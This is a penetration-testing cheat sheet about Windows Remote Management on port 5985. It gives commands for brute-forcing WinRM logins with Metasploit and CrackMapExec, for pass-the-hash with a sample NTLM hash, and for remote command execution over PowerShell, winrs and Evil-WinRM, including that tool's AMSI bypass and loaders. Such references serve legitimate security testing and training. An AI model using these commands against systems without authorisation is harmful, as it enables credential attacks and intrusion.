5985 - WinRM

Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based. Usaully run on port 5985.

Info

WinRM uses the PSRemoting (PowerShell remote) to login to a host and execute commands.

You can enable WinRM by running Enable-PSRemoting

By default WinRM uses port 5985 for sending traffic over HTTP (But it's still encrypted), and port 5986 for SSL.

If you can make a HTTP request (GET) to /wsman and you get 200 back, WinRM is enabled (on port 5985).

Add User to winrm group

net localgroup "Remote Management Users" /add bowen

Metasploit

The winrm_login module is a standard Metasploit login scanner to bruteforce passwords.

use auxiliary/scanner/winrm/winrm_login

Crackmapexec

cme winrm 192.168.1.0/24 -u userfile -p passwordfile

Powershell

From a powershell command prompt:

$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force 
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass) 
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }

Winrs

Winrs.exe is a built-in command line tool that allows for the execution of remote commands over WinRm with a properly credentialed user.

winrs -r:corp-dc "whoami /all"

Winrm.cmd

Command–line tool for system management is implemented in a Visual Basic Scripting Edition file (Winrm.vbs) written using the WinRM scripting API.

winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad"} -r:corp-dc

Ruby Script

A quick and dirty script - use  Alamot’s Ruby script 

Remember to change the username and password

Evil-WinRM

A comprehensive winrm shell

https://github.com/Hackplayers/evil-winrm

Install:

sudo apt install ruby-dev build-essential
sudo gem install evil-winrm

You can also execute built in 'Bypass-AMSI', 'DLL-loader', 'Dount Loader' and 'Invoke Binary' straight from the shell by just typing menu in the shell

We can also load powershell scripts using the -s option and providing a folder with scripts, and then just calling the script from the shell (example typing powerup.ps )and then when we go to the menu it will show the functions from that script.

Note: Evil-WINRM uses Invoke-Expression to execute command - therefor if you're in some kind of constrained language mode that isn’t allowing Invoke-Expression you will get errors.

Like this:


*Evil-WinRM* PS The term 'Invoke-Expression' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
    + CategoryInfo          : ObjectNotFound: (Invoke-Expression:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException>

CrackMapexec

Here’s an example of using CrackMapExec winrm method as local Administrator with a clear text password:

crackmapexec winrm -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183

Here’s example using a NTLM hash:

crackmapexec winrm -d . -u Administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -x "whoami" 192.168.204.183

Metasploit

WinRM Script Exec exploit module can obtain a shell without triggering an anti-virus solution, in certain cases. This module has two different payload delivery methods. Its primary delivery method is through the use of PowerShell 2.0. The module checks to see if PowerShell 2.0 is available on the system. It then tries to enable unrestricted script execution, an important step because PowerShell does not execute unsigned script files by default. If either of these checks fail, it will default to the VBS CmdStager payload method, otherwise it will use our Powershell 2.0 method.

use exploit/windows/winrm/winrm_script_exec

This can also be done using PowerShell for Linux (apt install pwsh or apt install powershell)

PS /> $pass = ConvertTo-SecureString 'kittycat1' -asplaintext -force
PS /> $cred = New-Object System.Management.Automation.PSCredential('htb\k.svensson', $pass)
PS /> Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate
[10.10.10.210]: PS>

If you get a error Unspecified GSS failure install gss-ntlmssp using apt.

Previous5900 - VNC Next6000 - X11

Last updated 5 years ago

Info

Add User to winrm group

Bruteforce login

Metasploit

Crackmapexec

Login from windows

Powershell

Winrs

Winrm.cmd

Login from Linux

Ruby Script

Evil-WinRM

CrackMapexec

Metasploit

Login from Windows